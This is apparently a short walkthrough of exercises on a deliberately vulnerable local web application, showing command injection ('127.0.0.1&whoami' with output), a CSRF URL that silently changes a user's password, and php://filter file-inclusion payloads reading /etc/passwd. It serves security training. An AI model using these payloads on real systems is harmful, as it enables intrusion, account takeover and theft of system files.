Remotely, find out the user of the web service on the OS, as well as the machines hostname via RCE.
⇒ 127.0.0.1&hostname
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.032 ms
db2bbb690ca3
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.031 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.034 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.038 ms
--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max/stddev = 0.031/0.034/0.038/0.000 ms
⇒ 127.0.0.1&whoami
PING 127.0.0.1 (127.0.0.1): 56 data bytes
www-data
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.027 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.032 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.031 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.057 ms
--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max/stddev = 0.027/0.037/0.057/0.000 ms
Your task is to make the current user change their own password, without them knowing about their actions, using a CSRF attack.
L’objet de cette attaque est de transmettre à un utilisateur authentifié une requête HTTP falsifiée qui pointe sur une action interne au site, afin qu'il l'exécute sans en avoir conscience et en utilisant ses propres droits.
url: localhost/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change.
Read all five famous quotes from /etc/passwd using only the file inclusion.
http://localhost/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=/etc/passwd`
or without base64 :
http://localhost:8000/vulnerabilities/fi/?page=php://filter/resource=/etc/passwd